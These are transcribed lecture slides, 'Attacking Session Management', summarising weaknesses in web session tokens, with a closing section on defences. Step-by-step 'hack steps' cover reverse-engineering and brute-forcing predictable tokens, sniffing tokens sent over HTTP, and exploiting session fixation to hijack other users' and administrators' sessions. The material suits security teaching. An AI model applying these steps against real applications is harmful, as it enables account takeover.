Transcript Chapter 7
Chapter 7 Attacking Session Management Juliette Lessing Session management • Enables the application to uniquely identify a given user across a number of different requests. • Prime target for malicious attacks against application. • Encountered defects. Two types of weaknesses • Weaknesses in Session Token Generation • Weaknesses in the handling of session tokens throughout their lifecycle. Weaknesses in Session Token Generation • Meaningful tokens (1) • Created using a transformation of the user’s user name or other info associated with them But actually: Meaningful tokens (2) • Exhibit some structure allowing an attacker to understand their function and means of generation. • Components: • User name • E-mail address • Client’s IP address Meaningful tokens (3) Hack steps: • Obtain single token from the application, modify it to determine validity. Change token’s value one byte at a time and check whether application is still accepted. Are some portions not required to be correct, exlude them. • Log in as several different users at different times and record the tokens received from the server. • Analyze the tokens for any correlations that appear to be related to the username and other user-controllable data. • Analyze the tokens for any detectable encoding or obfuscation. • If any meaning can be reverse engineered from the sample of session tokens, guess the tokens, find a page of the application that is session-dependent, and make large numbers of requests to this page using these guessed tokens. Monitor the results for any cases where the page is loaded correctly, indicating a valid session token. Weaknesses in Session Token Generation Predictable tokens (1) • Contain sequences or patterns • Arise from 3 different sources: 1. Concealed sequences 2. Time dependency 3. Weak random number generation Predictable tokens (2) 1. Concealed sequences Predictable tokens (2) 2. Time dependency Attack: • • • • • Start polling the server to obtain new session tokens in quick succession Monitor the increments in the first number. Increases more than one? Token has been issued by another user We know upper and lower bounds of second number which was issued to them brute-force attacks in order to successfully access a protected page Running this scripted attack continuously will enable us to capture the session token of every other application user. When an administrative user logs in, we will fully compromise the entire application. Predictable tokens (3) 3. Weak random number generation This algorithm takes the last number generated, multiplies it by one constant, and adds another constant, to obtain the next number. The number is truncated to 48 bits, and the algorithm shifts the result to return the specific number of bits requested by the caller. Weaknesses in Session Token Handling Disclosure of tokens on the network (1) Weaknesses occur when: • • Some applications elect to use HTTPS to protect the user’s credentials during login but then revert to HTTP for the remainder of the user’s session Some applications use HTTP for preauthenticated areas of the site, such as the site’s front page, but switch to HTTPS from the login page onwards. Disclosure of tokens on the network (2) Hack steps: • Walk through application in normal way and identify login functions and transitions between HTTP and HTTPS communications • Are HTTP cookies used as transmission mechanism? Verify whether secure flag is set • Determine whether session tokens are ever transmitted over an unencrypted connection. Yes? Regard them as vulnerable to interception • Verify whether a new token is issued following login, or whether a token transmitted during the HTTP stage is still being used to track the user’s authenticed session • Verify whether server is listening on port 80. If so, visit any HTTP URL directly from with an authenticated session and verify whether the session token is transmitted • In cases where a token for an authenticated session is transmitted to the server over HTTP, verify whether that token continues to be valid or is immediately terminated by the server. Weaknesses in Session Token Handling Disclosure of tokens in logs • causes of session tokens appearing in system logs Weaknesses in Session Token Handling Vulnerable session termination (1) • Some applications do not provide effective logout functionality: • • • A log-out function is not implemented The logout function does not actually cause the server to invalidate the session When a user clicks Logout, this fact is not communicated to the server at all, and so the server performs no action whatsoever. Vulnerable session termination (2) Hack steps: • Investigate whether session expiration is implemented on the server side • Determine whether a logout function exists and is prominently made available to users. If not, users are more vulnerable because they have no means of causing the application to invalidate their session. • Where a logout function is provided, test its effectiveness. After logging out, attempt to reuse the old token and determine whether it is still valid. If so, users remain vulnerable to some session hijacking attacks even after they have “logged out.” Weaknesses in Session Token Handling Client Exposure to Token Hijacking Hack steps (1): • Identify any cross-site scripting vulnerabilities within the application and determine whether these can be exploited to capture the session tokens of other users • If the application issues session tokens to unauthenticated, obtain a token and perform a login. Hack steps (2): • Check whether the application is willing to return to the login page eventhough you are already authenticated, sumbit another login as a different user using the same token. If it does not issue a fresh token, it is vulnerable to session fixation • Identify the format of session tokens used by the application. Modify your token to an invented value that is validly formed, and attempt to login. If the application allows you to create an authenticated session using an invented token, then it is vulnerable to session fixation. Securing Session Management In order to perform session management in a secure manner: 1. Generate strong tokens 2. Protect Tokens throughout Their Lifecycle • • • • • should only ever be transmitted over HTTPS never be transmitted in the URL Logout functionality should be implemented Session expiration should be implemented after a suitable period of inactivity (e.g., 10 minutes). Etc. Securing Session Management Per-page Tokens • New page is created every time • Prevents session fixation attacks